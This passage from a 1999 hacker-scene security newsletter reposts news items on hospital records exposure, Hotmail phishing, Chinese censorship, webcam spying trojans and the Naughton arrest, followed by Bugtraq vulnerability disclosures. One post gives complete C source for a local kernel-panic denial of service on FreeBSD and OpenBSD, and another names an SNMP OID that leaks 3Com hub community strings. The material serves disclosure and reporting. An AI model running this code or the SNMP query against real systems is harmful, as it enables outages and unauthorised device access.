the cards on an unwise choice. David M. Bresnahan, a contributing editor for WorldNetDaily.com, is the author of a new report on Y2K, the book "Cover Up: The Art and Science of Political Deception," and offers a monthly newsletter "Talk USA Investigative Reports." He may be reached through email and also maintains an archive of his work. Referenced links: How to read/change the barcode: http://www.geocities.com/SiliconValley/Bridge/1086/School/barcodes.html Interview: http://www.worldnetdaily.com/bluesky_exnews/19990922_xex_louisiana_hi.shtml Handbook; http://www.cab.latech.edu/ruston/rhs/hand2.htm @HWA 28.0 HOSPITAL SECURITY ISSUES ~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Thursday 23rd September 1999 on 1:01 pm CET WBAI's Off The Hook radio show released information about poor security issues in St. Joseph's Mercy Hospital. According to them, glitch in the voice mail system allows callers to access private date of hospital's patients without entering any kind of password. Story on ZdNet. (For those that don't know (you been living under a rock??) Off The Hook is hosted by Emmanuel Goldstein (Eric Corley) founder and editor of 2600 magazine, he can often be found online on EFNet IRC in #2600 or #off-the-hook) http://www.zdnet.com/zdtv/cybercrime/news/story/0,3700,2339660,00.html Medical Records Security Breach Unprotected voice system is used by hospitals across United States; company that provides system said security features were included. September 23, 1999 A disturbing security breach at St. Joseph's Mercy Hospital in Pontiac, Michigan, left some confidential patient records accessible to the public because the system did not require users to input a password or any other security roadblock. Emmanuel Goldstein, publisher of the hacker magazine and website 2600.com, first reported the flaw on public radio station WBAI's "Off The Hook" on September 21. The hospital's location was not known at that time. Goldstein published a sample audio file on the 2600.com website to alert the country to the problem, but excised the patient's name. Since then a CyberCrime investigation revealed the location of St. Joseph's Mercy Hospital as Pontiac, Michigan. The hospital system uses an internal digital dictating service that allows doctors to record and access notes concerning recent patient examinations and consultations. The notes include information about patients, ranging from admitting and discharge data, to cardiac and mental health records. Sonja Berry, public relations spokeswoman for St. Joseph's Mercy Hospital said the hospital took immediate action to correct the situation and reaffirms that the private information is no longer available to outside callers. She said the hospital is now investigating to ensure the problem will never happen again. Berry also said that she could not provide an explanation for the error, but confirmed that the dictation service was provided by Dictaphone Corporation of Stratford, Connecticut, and is used by other hospitals around the country. Security features disabled? In a phone interview with CyberCrime Legal Analyst Luke Reiter, Dictaphone Vice President Don Fallati said the company wants more time to verify that the system was installed by Dictaphone. However, Fallati insists that Dictaphone's products include security features. "We are trying to confirm that, in this particular instance, the system is ours, and what the background to it was," Fallati said. "But in general, our digital dictation systems do have password-protection features that can be enabled." "I'm just not sure in this case what the background was as to why or why not those may have been used," Fallati added. The CyberCrime team continues to investigate whether these password-protection measures were disabled-- and if so, by whom. @HWA 29.0 HOTMAIL STILL FAR FROM SECURE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Wednesday 22nd September 1999 on 11:30 pm CET Microsoft can't seem to shake the security gremlins from its Hotmail free email service. The software giant is investigating yet another security dilemma with its Hotmail service that permits the sending of JavaScript code that could automatically present a bogus password entry screen. Usernames and passwords entered by unsuspecting users could be collected by the email sender. Georgi Guninski today pointed out this latest problem in the so plagued free e-mail service, revolving around bypassing Hotmails' security policies regarding JavaScript code through putting it in HTML image files. http://news.cnet.com/news/0-1005-200-122099.html?tag=st.ne.1002.thed.1005-200-122099 Hotmail bug allows password theft By Erich Luening Staff Writer, CNET News.com September 22, 1999, 12:45 p.m. PT Microsoft can't seem to shake the security gremlins from its Hotmail free email service. The software giant is investigating yet another security dilemma with its Hotmail service that permits the sending of JavaScript code that could automatically present a bogus password entry screen. Usernames and passwords entered by unsuspecting users could be collected by the email sender. Microsoft said it is looking into the issue, although it has not received any other reports on this security problem. JavaScript is a Web scripting language developed by Netscape Communications for performing actions on Web pages without user input. The language is commonly used for launching pop-up windows or for scrolling text, but it has also become a major security headache for browser makers and Web sites like Hotmail because of its potential usefulness to malicious hackers. Earlier this month, Microsoft confirmed a JavaScript password-stealing exploit that had the same effect as the most recent one, but that was implemented differently, according to Georgi Guninski, a Bulgarian programmer. Guninski claims the new JavaScript glitch circumvents Hotmail security barriers by placing the JavaScript in HTML image files. Microsoft confirmed that the glitch is yet another way to execute malicious code in someone's email. "We do filter out some JavaScript tags to provide better security, to stop some hacks and spoofs," said MSN lead product manager Deanna Sanford. "As we get these reports, we are evaluating other filters to provide to users. It's an ongoing process." As an extreme measure to protect against such security breaches, both Guninski and Sanford said users can disable JavaScript in their browsers. After a security problem last week exposed Hotmail users to attack, Microsoft acknowledged it was hiring an outside firm to examine security at the free email service. @HWA 30.0 THE GREAT FIREWALL OF CHINA ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Wednesday 22nd September 1999 on 11:20 pm CET China is a growing market for online companies and services. But nowadays a 1993 ban on foreign investment in its online industry has put up quite a hurdle for companies dealing in tech products and e-commerce a like so far. China's main concerns with the Internet focus on one thing, how to remain in control. Here's an article on how they're planning to do just that. http://www.thestandard.com/articles/display/0,1449,6411,00.html?home.of The World's Wide Web: The Great Fire Wall of China By Matthew Yeomans Here's a global teaser: Name the country that currently languishes at the bottom of the Internet food chain, but will have an estimated 141 million people online by the year 2005 and will be the largest e-commerce market in the world. Hint: It's the most populous nation on earth. Right now, China counts only 1.4 million Internet users, but that hasn't halted companies like Microsoft (MSFT) , AOL (AOL) , Yahoo (YHOO) and Dow Jones from plunging into the alluring, but officially off-limits, waters of the Chinese Internet industry. Even Christian broadcaster Pat Robertson is getting in on the act as a major investor of Zhaodaola, a Beijing-based Web portal. But amid the heady rush to dot-com this vast country lies a nagging question: What will be the electronic boundaries of the Net in China? The answer is of prime concern for Western investors who spend long days strategizing about how to wire the sleeping giant. The person who may hold the answer, at least for the moment, is Wu Jichuan, China's minister of information industry. That's why Western politicians and executives were dumbstruck as Wu announced that his government would begin to enforce a 1993 ban on foreign investment in its online industry. Wu's salvo may signal little more than a return to hardball negotiations over China's entry into the World Trade Organization, which the Clinton administration would like to see happen before the end of the year. "This is classic Chinese bargaining," says Peter Lovelock, head of Maverick, a telecom consulting company in Hong Kong. But other industry watchers aren't as convinced. "The head of MII is seeming to kick the door shut on foreign investment in China's information industries," says Ken Grant, executive editor of Virtual China's China Matrix Web site. "It remains to be seen whether he can keep it closed." Somewhere beyond all this Beijingology lie two fundamental concerns for China: How does it maintain control of what could be its most influential industry of the next century, and, just as important, how does it control the information passed along the Web? After all, the Internet may be a fine tool for promoting e-commerce in a giant structured market economy, but it's likely to play havoc with the official party line. This hasn't been lost on the ruling technocrats who realize the Internet is their real-life forbidden fruit: They can't wait to taste it, but they dare not. Not surprisingly, all the major players in the domestic Internet boom are closely monitored by the Chinese government and any offending information, for instance about Taiwan, Tibet or whatever the current bete noire, is quickly blocked by a vigilant team of government Web censors. Both the leading domestic portals Netease and Sina.com rarely run afoul of the authorities because they don't place material that breaks from the party line on their mainland Chinese sites. Ironically, the government's most high-profile victim of political blocking so far is its own China.com, a strictly controlled Web portal that is traded on the Nasdaq and is 60 percent owned by the state news service Xinhua with AOL holding another 8 percent. Last spring, according to watchers of the Chinese Web, China.com caught the censors' eyes when it ran items about Taiwan on its mainland site. The articles were compiled by programmers based in Hong Kong. China.com has publicly denied being blocked. But the ever expanding Web universe stretches well beyond the eye of even China's Ministry of Information Industry. Internet users in China report that the government either overlooked or couldn't be bothered to block a U.S. State Department archive site on the 1989 Tiananmen protests. That's just the sort of vast cybersecurity breach which international dissidents and human-rights activists intend to exploit. While they may be able to reach only a small percentage of the Chinese population, activists maintain that in a Chinese society, where Internet access is available only to the rich, the intellectuals and the students, it's not about how many people they reach, but which ones. "What scares the Chinese government so much is that the people who have access to the Internet right now have historically been the people who have launched revolutions," says Bobson Wong, director of the Digital Freedom Network, a Web site dedicated to airing dissident voices that have been silenced in their own lands. Leading the charge is a former Tiananmen Square activist who goes by the pseudonym, Richard Long. Everyday, Long publishes a newsletter called VIP Reference that he sends to over 30,000 Chinese e-mail accounts � whether they want it or not. In short, Long is using the scourge of Western e-commerce, spamming, to advocate social change in China. VIP Reference is taken so seriously in China that two weeks ago, one dissident, Qi Yanchen, was arrested and charged with sedition for printing copies of the newsletter to pass around. While some activists complain that Long's political mass mailing alienates people in China and endangers some underground dissidents, Long says VIP Reference feeds "an information-hungry country." With spam, of course. But is it realistic to expect Internet commerce to bring about democracy in China? After all, telling China that it's morally better to be like the West and here's a new Pepsi ad to prove it is unlikely to change a government that hasn't so much as flirted with democracy for over 5,000 years. At the same time, in a world where Tiananmen Square leader Ling Chai seeks to realize her ideals through a software startup, it's not surprising that someone like Long would seek to make politics and business work together. Long thinks nothing of exchanging his database of 500,000 addresses with young Chinese entrepreneurs in return for a list of their clients. "Everybody knows I have the largest Internet database in China," he says, matter-of-factly. Despite Wu's concerns over controlling the telecommunications industry, China may well already be on an unstoppable course. While the cost of PCs remains prohibitively high for the ordinary Chinese, the country's cellular and cable network offers the hope of cheap mass connectivity in the near future. And while the Chinese may not surf as much as Americans, they certainly watch TV. There are some 320 million television sets in China, and companies such as the Web portal MyWeb are exploring the possibilities of wiring China via a vast system of set-top boxes. So even if China chose to pursue its digital future alone, it might still be building a bigger soapbox for Long and other dissidents. You never know, the revolution may yet be televised. @HWA 31.0 FTC CRACKS INTERNATIONAL PORN RING ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Wednesday 22nd September 1999 on 10:40 pm CET US and Australian authorities have raided a online porn ring, which according to the Federal Trade Commission, "hijacked" Web sites and "kidnapped" innocent surfers, redirecting them to its smut sites. The FTC also announced a new Internet Lab that will track and gather evidence on illegal activities in cyberspace. ZDNet http://www.zdnet.com/zdnn/stories/news/0,4586,2339568,00.html?chkpt=hpqs014 -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- FTC cracks international porn ring By Randy Barrett, Inter@ctive Week September 22, 1999 1:10 PM PT URL: http://www.ynotnetwork.com/ho/index.html The Federal Trade Commission announced Wednesday it has won a federal injunction against an international porn ring that cloned 25 million Web pages and "hijacked" unsuspecting visitors to its smut sites. The defendants -- Carlos Pereira, Guiseppe Nirta and his company called W.T.F.R.C. Pty. Ltd. -- were all named in a preliminary injunction by the Eastern District Court of Virginia. Periera is believed to reside in Portugal, while Nirta and WTFRC are based in Australia. "These operators hijacked Web sites, 'kidnapped' consumers and held them captive," said Jodie Bernstein, director of the FTC's Bureau of Consumer Protection. "When consumers used search engines to find subjects as innocent as 'Kids on the Net,' 'News about Kosovo,' or 'wedding services,' they risked being exposed to a torrent of tawdry images." In its complaint, the FTC alleged that the group "page-jacked" 25 million legitimate Web pages by copying them in their entirety and either resubmitting them with search engines such as AltaVista and Yahoo! (Nasdaq:YHOO), or waiting for automatic crawlers to do the work for them. The purloined pages included those of the Harvard Law Review, the Japanese Friendship Garden and NewWorld.com, which owns the popular Adrenaline Vault game site. The net effect of the mass page copying was that Web surfers using search engines would choose sites with legitimate names and descriptions, but be instantly redirected to porn enclaves. Once there, the FTC alleges, the defendants used another trick, called "mouse trapping," to render the back-page and browser-close buttons useless via special Java code. Visitors were then forced to shut down their computers to close the session. Australian raids Australian law enforcement raided WTFRC facilities Wednesday and seized numerous servers as evidence. Allan Asher, deputy chairman of the Australian Competition and Consumer Commission, said by videophone from Canberra that law enforcement authorities there had raided eight locations, gathering information for possible criminal prosecution or civil action. FTC officials said the Portuguese Instituto do Consumidor had cooperated in investigations of Pereira. Web address administrator Network Solutions Inc. (Nasdaq:NSOL) appears to have complied with the federal injunction and shut down several domains used by the defendants, including www.atariz.com and www.pirate.lynx.com. Bernstein presented lawyer John Fischer of Irving, Texas, who said his client, Newworld.com, owner of the game site Adrenaline Vault, at Avault.com, was hijacked. In court papers, Fischer said the company was considering the possible sale of a portion of Adrenaline Vault to investors for more than $20 million when the hijacking occurred. 100th FTC complaint "We lost thousands of dollars a day (in value)," Fischer told the news conference, until he got search engines to restore access. Fischer said he sought help without success from the FBI, state and local authorities. Eventually the Federal Trade Commission became involved, exercising its authority to act against deception and unfairness to consumers. At its press conference, the FTC also unveiled a new Internet Lab where the agency will track and gather evidence on illegal activities in cyberspace. The "page-jacking" case is the 100th Internet-related complaint brought by the commission to date. Reuters contributed to this report. @HWA 32.0 WINLINUX2000 Windows or Linux? can't decide? try this ... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <geez, it had to happen didn't it?, now everyone that can't get linux running is gonna be grabbing this and trying to run 'sploits and shit...reminds me of the bbs days when Christmas rolled around and all the newbies that got modems for xmas flooded the boards...sigh - Ed > From Help Net Security http://www.net-security.org/ by BHZ, Wednesday 22nd September 1999 on 3:27 am CET Ever heard of WinLinux 2000? Today final Beta version of WinLinux 2000 for evaluation and testing was released. WinLinux 2000 is the first Linux distribution developed for Microsoft Window. http://linuxpr.com/releases/406.html WinLinux 2000: The First Linux for Windows Sep 21st, 16:09 UTC JRCP today released to the Internet community the final Beta version of WinLinux 2000 for evaluation and testing. September 21, 1999 - JRCP today released to the Internet community the final Beta version of WinLinux 2000 for evaluation and testing. WinLinux 2000 is the first Linux distribution developed for Microsoft Windows(tm) users and its unique features include: Windows integration: WinLinux 2000 uses the latest technology available in the industry to install as easily as any Windows application. Smart configuration: Thanks to the exclusive detection software which combines Windows and Linux expertise, most of the hardware devices are detected and automatically configured to reflect current settings and preferences. Safe installation: WinLinux 2000 performs a safe installation because a risky operation (HD repartitioning) common to most Linux systems is not needed to install it Easy troubleshooting: a Troubleshooting Utility is included to simplify the request of Online Support Optimal Disk Usage: WinLinux 2000 shares free disk space with Windows, i.e., you do not have to set two independent hard disk partitions that do not share free disk space. Familiar look and feel: K Desktop Environment plus WinLinux additions turn it into a familiar place to work with easy access to Windows network drives and the Internet. "WinLinux is a real alternative for both Windows and Linux users", says Jacob Hartmann, 52, JRCP CFO. WinLinux 2000 uses the award winning K Desktop Environment as its graphical user interface. It comes with Netscape Communicator, KOrganizer and support for Debian, Slackware and Red Hat format packages which extend the range of supported applications. As WinLinux 2000 bridges the gap that has been preventing Windows users from installing and configuring a Linux system in the last years, it is expected that more and more software vendors port their desktop applications, games and utilities to this open platform. According to Mr. Dinamerico Schwingel, 30, JRCP CTO, "Linux has already matured to be used on desktop machines and, besides that, it is based on the Open Source concept which leverages the playing field for all software makers". During the installation process WinLinux 2000 does not change any of the machine settings and keeps users' data safe from partitioning the hard drive. The product is being placed as an add-on to Microsoft Windows and it is even displayed as installed sofware in the Control Panel. Although WinLinux 2000 installation is in English, support for German, French or Spanish can be selected after installing it. Beta version of WinLinux 2000 can be downloaded from the website http://www.winlinux.net and no registration is required. The release version is expected to be available by beginning of November. Further contact must be addressed to info@winlinux.net Windows is a registered trademark of Microsoft. Linux is a registered trademark of Linus Torvalds. WinLinux is a service mark of JRCP. Other trademarks belong to their owners. JRCP is a privately held company and can be contacted by e-mail at info@winlinux.net or on the web at http://www.winlinux.net. (Submitted by Dwight Johnson of Linux Today) @HWA 33.0 YOUR PC COULD BE TAPPED ~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Wednesday 22nd September 1999 on 0:10 am CET If you're finding user-installed cameras and/or microphones on Windows NT machines in your enterprise, be afraid--they could be used for electronic espionage. As we reported earlier U.S. Army special agents have been showing their commanding officers how to turn microphones and cameras into remote spying devices using remote administration tools as BO and Netbus. Here's another article about it. http://www.pcworld.com/pcwtoday/article/0,1510,12891,00.html Your PC May Be Tapped Microphones and cameras can provide hackers with the perfect view for electronic espionage. by Computerworld staff, Computerworld September 21, 1999, 10:31 a.m. PT If you're finding user-installed cameras and/or microphones on Windows NT machines in your enterprise, be afraid--they could be used for electronic espionage. For the past four months, U.S. Army special agents have been showing their commanding officers how to turn microphones and cameras into remote spying devices. "We run this in the lab here all the time. You can hear the guys talking (from another room), but they have no idea you're listening to them," says Jeff Hormann, special agent in charge of the Computer Crime Resident Agency, U.S. Army Criminal Investigation Command. The attack is delivered to the victim as a Trojan horse--a hostile applet carrying executable code--via an e-mail attachment. Once the attachment is opened, the attacker, using ports 12345 and 12346 on the desktop, or via HTTP Web protocol and file transfer protocol connections, can load a remote administration tool and order the Trojan horse to turn on the video and/or audio of the targeted machine. By exploiting remote administration tools such as NetBus and Back Orifice, both of which the Army has proved can be used, the attacker can hijack desktop camera and microphone applications and then direct image and voice transmissions to the attacker's PC. Because user-installed cameras and microphones usually don't have indicator lights, the victim is completely unaware of any eavesdropping, according to Hormann and others. And no desktop image, except maybe a small tool bar icon, will appear on the victim's computer to indicate that the audio and video capture are on, he adds. Uninvited Attendees? Worse, says Powell Hamilton, manager of technology risk services at PricewaterhouseCoopers, attackers can use the same tactics to hijack an online meeting session conducted through systems like Microsoft's NetMeeting, and grab shared whiteboard information. One comforting fact, Hamilton says, is that microphones and cameras have yet to proliferate across the enterprise because image, voice, and videoconferencing technologies are still rough around the edges. And, he adds, security fears will probably continue to stall widespread adoption. Hamilton says nearly 40 percent of the client sites he has reviewed don't have virus protection, and 90 percent don't use intrusion detection software. While this may seem like a basic step, keeping virus- and intrusion-detection tools up to date can help. Symantec's Norton AntiVirus, for example, recognizes when NetBus 1.6 and 2.0 and Back Orifice and Back Orifice 2000 are running on a desktop. But hackers now possess compiling tools to change the attack signatures, making it more difficult for packaged applications to catch these attacks. So, what can you do about electronically committed corporate espionage? First, manually cap cameras and unplug microphones when you are not using them. And if your organization is moving toward adoption of voice and video technologies, pay for higher-end microphones and cameras with indicator lights. For more enterprise computing news, visit Computerworld Online. Story copyright 1999 Computerworld Inc. All rights reserved. @HWA 34.0 HOW THE FBI BAITED THE NAUGHTON TRAP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Tuesday 21st September 1999 on 11:55 pm CET By now you've probably all heard of Patrick Naughton getting arrested for allegedly luring a 13-year-old girl into a sexual liaison. Here's an article on that and on how the FBI lured him into the trap using "cyber-tricks" (basically pretending to be a young girl). The Seattle Times. http://www.seattletimes.com/news/local/html98/patt_19990921.html How FBI baited trap that snared Web wiz by Ian Ith Seattle Times Eastside bureau In the pantheon of the Internet, the brilliant minds that invented, shaped and groomed the cyberspace world, Patrick Naughton is at least a demigod. To the tech-savvy, he is something close to a household word. He is credited with inspiring and helping to invent Java, the revolutionary, Internet-friendly computer language. Later, he was a guiding force in Paul Allen's brainchild Starwave. And most recently, he was an executive vice president at the popular Web portal company Infoseek. He is worth millions. So yesterday, while some who worked with Naughton said it was no secret he frequented cyberspace's seamier side, it was hard to comprehend how someone so deeply in tune with the technology could have stumbled into an FBI trap - allegedly duped into thinking he was luring a 13-year-old girl into a sexual liaison when in reality he was the one about to be snared. "It has not been a secret we're out there policing the Internet," said Special Agent Randy Aden, who heads the FBI team that arrested Naughton on Thursday in Santa Monica, Calif. Naughton, 34, has been charged in federal court with interstate travel with the intent of having sex with a minor. Additional charges are possible. Investigators are reviewing the contents of a laptop computer Naughton turned over to them. He is free on $100,000 bond while awaiting arraignment Oct. 12 in California. Under terms of his bail, he can't go anywhere but Washington and California, he surrendered his passport, he can't use the Internet except for business purposes and is forbidden to be alone with minors without consent of their parents, said Assistant U.S. Attorney Patricia Donahue. Naughton has not commented and couldn't be reached yesterday. How the FBI tracks chat rooms In a criminal complaint filed in U.S. District Court, agents said they posed as a teen in an Internet chat room in March and were contacted by Naughton, who was calling himself "hotseattle." Over seven months, "hotseattle" and agents conversed, the complaint said. Authorities said he invited the "girl" to meet him Sept. 16 at the Santa Monica Pier, promising to take her to his hotel room and show her photos of himself with another girl he supposedly had on his computer. Instead, the person waiting was an undercover FBI agent. Naughton was jailed overnight, and his laptop computer seized as evidence. Naughton, Aden said, was essentially netted in an FBI trawling expedition in the vast ocean of chat rooms. Aden is one of a pair of special agents assigned to the FBI's Sexual Assault Special Enforcement (SAFE) team in Los Angeles, which was formed in 1995 because of the sudden upsurge in sex crimes using the Internet. How the FBI tracks chat rooms is a trade secret, Aden said. But the complaint involving Naughton reveals at least one key element: They use the same cyber-tricks that make chat-room visitors think they are safe and anonymous. Internet chat rooms allow people to log on using strictly anonymous nicknames. And newer, Internet-based e-mail services such as Hotmail and Yahoo! allow people to get and send e-mail anonymously. "The Internet gives a false sense of anonymity," Aden said. So FBI agents go to chat rooms and pretend to be young girls. Essentially, they bait the hook and hope for a bite. The criminal complaint against Naughton said that while he was arranging to meet with the undercover agent, he also was allegedly chatting with other girls and claimed to have already met some of them. The origins of Java Naughton's rise to success started in his family's popular restaurant in Churchville, N.Y., where Naughton earned enough money to buy his first computer, an Apple II. After earning straight A's in Catholic schools, Naughton worked his way through college as a software engineer. He graduated from Clarkson University in Potsdam, N.Y., in 1988. Immediately, he was off to Silicon Valley to work for Sun Microsystems. Two years later, Naughton was frustrated with the company and had accepted another job with Apple Computer founder Steve Jobs at his new company, NeXT. As an off-handed, parting shot, Naughton sent a missive to Sun CEO Scott McNealy saying Sun had lost its vision. McNealy paid to keep Naughton and handed him the reins of a project called "Green," which would eventually give birth to Java, a computer language that can be read by more than one computer operating system. "If I had left, Java wouldn't have existed," he told the Rochester Business Journal in New York in 1997. In the wake of Java's success, he also wrote two books, "The Java Handbook" and "Java: The Complete Reference." In a 1997 piece he wrote for Forbes magazine titled "Mr. Famous Comes Home," Naughton said he joined Starwave because he had finally had enough of Sun: "I had done all this work and was not going to get any of the glory," he said. "But I'd have lots and lots of regrets if I'd become a short-order cook at Denny's. Given that I'm the president of a company that has five of the top 10 Internet properties on the planet, it's OK. . . . I'm glad I'm at the top of the food chain." So much to lose At Starwave and later at Infoseek, he is known as an outgoing, energetic leader. He enjoys ice hockey and boating and played on a company soccer team. "He's someone whom everybody looked up to," said an Infoseek employee who asked not to be named. "It's a double sting to have someone who was looked up to have a fall like this." Not everyone was so surprised. Other former colleagues said it was common knowledge around the office that Naughton frequented chat rooms. Meanwhile, Naughton's former colleagues at Sun, as well as executives at Starwave and Infoseek, have declined comment. Infoseek has said only that Naughton no longer works there, and the company doesn't condone "behavior of this nature." Disney, which owns 43 percent of Infoseek and is in the midst of buying the rest of the company, has sought to distance itself from Naughton's arrest. He was an employee of Infoseek, not Disney, a spokeswoman said. But at the same time, top Disney executive Steven Bornstein is visiting the Bellevue office today to speak with employees. Bornstein was recently named the new chairman of Disney's Buena Vista Internet Group. Naughton is married to a Seattle artist. They have no children. His stock and options in Infoseek, where he earned $183,000 a year, have been valued at $13.3 million. The couple's Perkins Lane home overlooking Puget Sound was purchased for $1.2 million. To most observers, what seems strange is that someone like Naughton, with so much to lose, could do what the FBI says he did. But counselors who treat sex offenders aren't surprised at all by such cases. "You're asking: How could somebody so smart be so stupid?" says Michael O'Connell, president of the state chapter of the Association for the Treatment of Sexual Abusers. "The working answer is, boy, when you get yourself wrapped up in this stuff - whether it's alcohol abuse, gambling or sexual compulsion - you can sometimes lose your way. Being smart may be protective, but it's by no means a guarantee." Internet replaces schoolyard Sex-offender treatment providers and law-enforcement officers alike say the Internet has made their job much harder. "Pedophiles don't have to hang around schoolyards with bags of candy anymore," said Ray Lauer, an FBI agent in Seattle. "They can just go to an Internet chat room to get what they want." During the Internet chats, the complaint said, Naughton allegedly persisted in his requests to meet the girl, though he was repeatedly asked if he realized he was typing to a 13-year-old and could get into trouble. As investigators, Aden said, "We sure make it clear we are underage, and if they don't want to go forward, that's fine with us. "Some people do get pangs of conscience and back out. It's good to see somebody back away. But we still have people - and in positions of incredible responsibility - who still go ahead." Seattle Times staff reporters Jack Broom, Helen Jung, Susan Gilmore, Carol Ostrom and Arthur Santana contributed to this report. Copyright � 1999 Seattle Times Company @HWA 35.0 HAPPY BIRTHDAY TO LINUX ~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Saturday 18th September 1999 on 5:12 pm CET Yesterday was 8th anniversary of the initial public release of Linux - version 0.01 - that occurred on the 17th September 1991. As Linus Torvalds said: "Software is like sex; it's better when it's free", Linux will remain free for distribution. @HWA 36.0 3com SNMP bug vulnerabilty ~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: Re: One more 3Com SNMP vulnerability To: BUGTRAQ@SECURITYFOCUS.COM Hi all, Well spotted. To be more accurate, this bug can be found on 3Com SuperStack II Port Switch Hubs running software version 2.10. The bug disappeared from version 2.12. New software versions are available at http://support.3com.com/software/superstack_ii_ps_hub_40_fil es.htm Arnaud Bienvenu. -- Hi, It seems that 3Com does not pay much atention how its SNMP is implemented. In 3Com SuperStack II hubs MIB there's an OID: .1.3.6.1.4.1.43.10.4.2. Its name decodes to .iso.org.dod.internet.private.enterprises.a3Com.generic.secu rity.securityUserTable. What You need to know that's read-only community and this OID will give you entire table of communities (read-write and read-only). If somebody knows how to contact 3Com with such reports forward this info to them. Half an hour exploring 3Com web site i found no e-mail's (not even <A HREF="mailto:support@3com.com">support@3com.com</A>). Amazing... -- Nerijus Krukauskas Bank of Lithuania Division head IT department, Networking division Tel. +370-2-680731 Zirmunu 151 <A HREF="mailto:nkrukauskas@lbank.lt">nkrukauskas@lbank.lt</A> 2012 Vilnius, Lithuania @HWA 37.0 FreeBSD local DoS on network by unpriviledged user using setsockopt() ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: Local DoS on network by unpriviledged user using setsockopt() To: BUGTRAQ@SECURITYFOCUS.COM Recently, I mailed this mailing to a number of people who are concerned with security of various OSes, like FreeBSD, OpenBSD and NetBSD. The mailing was NOT intended to be made public, but somehow it was. Here is my original mailing: --- Forwarded --- I stumbled across a denial of service attack on FreeBSD systems, where an unpriviledged user can panic the kernel. Quick and dirty testing (code attached at the end of this mail) showed OpenBSD is vulnerable too: FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to test it on older FreeBSD versions. OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192: The kernel logs one "/bsd: mb_map full" and all processes trying to send something over the network get stuck waiting in mbuf. Locally the system continues to function. Tested by a friend. NetBSD: Not available, but it is highly probable that the affected code in OpenBSD is from its parent NetBSD. As far as I'm concerned, this can be handled quietly and without much haste. Knowledge of this problem is limited and there is absolutely no intention of publishing this exploit or messages to Bugtraq. With kind regards, Sven Berkvens (sven@ilse.nl) Long time FreeBSD-system administrator The source code for the program that causes this: #include <unistd.h> #include <sys/socket.h> #include <fcntl.h> #define BUFFERSIZE 204800 extern int main(void) { int p[2], i; char crap[BUFFERSIZE]; while (1) { if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) break; i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); fcntl(p[0], F_SETFL, O_NONBLOCK); fcntl(p[1], F_SETFL, O_NONBLOCK); write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } exit(0); } ----- End forwarded message ----- @HWA 38.0 BSD:Three ftp daemons in ports vulnerable to attack. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: [security-officer@FreeBSD.ORG: FreeBSD Security Advisory: FreeBSD-SA-99:03.ftpd REISSUED] To: BUGTRAQ@SECURITYFOCUS.COM [security-officer@FreeBSD.ORG 2.ems Content-Type: text/plain; charset=us-ascii *** PGP Signature Status: unknown *** Signer: Unknown, Key ID xBE7497F1 *** Signed: 9/15/99 11:30:30 PM *** Verified: 9/17/99 1:04:54 PM *** BEGIN PGP VERIFIED MESSAGE *** ----- Forwarded message from FreeBSD Security Officer <security-officer@FreeBSD.ORG> ----- Delivered-To: freebsd-announce@freebsd.org Date: Wed, 15 Sep 1999 21:46:28 -0600 (MDT) From: FreeBSD Security Officer <security-officer@FreeBSD.ORG> Subject: FreeBSD Security Advisory: FreeBSD-SA-99:03.ftpd REISSUED Reply-To: security-officer@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk To: undisclosed-recipients: ; -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-99:03 Security Advisory FreeBSD, Inc. Topic: Three ftp daemons in ports vulnerable to attack. Category: ports Module: wu-ftpd and proftpd Announced: 1999-09-05 Reissued: 1999-09-15 Affects: FreeBSD 3.2 (and earlier) FreeBSD-current and -stable before the correction date. Corrected: FreeBSD-3.3 RELEASE FreeBSD as of 1999/08/30 for wuftpd only (Note: there is only one ports tree which is shared with all FreeBSD branches, so if you are running a -stable version of FreeBSD you will also be impacted.) FreeBSD only: NO Bugtraq Id: proftpd: 612 Patches: NONE I. Background wuftpd, beroftpd and proftpd are all optional portions of the system designed to replace the stock ftpd on a FreeBSD system. They are written and maintained by third parties and are included in the FreeBSD ports collection. II. Problem Description There are different security problems which can lead to remote root access in these ports or packages. The standard ftp daemon which ships with FreeBSD is not impacted by either of these problems. III. Impact Remote users can gain root. IV. Workaround Disable the ftp daemon until you can upgrade your system, or use the stock ftpd that comes with FreeBSD. V. Solution Upgrade your wu-ftpd port to the version in the cvs repository after August 30, 1999. If you are not using the wu-ftpd port, then you should visit their web site and follow instructions there to patch your existing version. beroftpd, which was listed in the original wu-ftpd group's advisory as having a similar problem, has not been corrected as of September 15, 1999. It will not be in the 3.3 release. The port has been marked forbidden and will remain so until the security problems have been corrected. If you are running beroftpd you are encouraged to find if patches are available for it which corrects these problems before enabling it on your system. proftpd, which had different security problems, has not been updated to a safe version as of September 15, 1999. It will not be in the 3.3 release. It will not be in the 3.3 release. The port has been marked 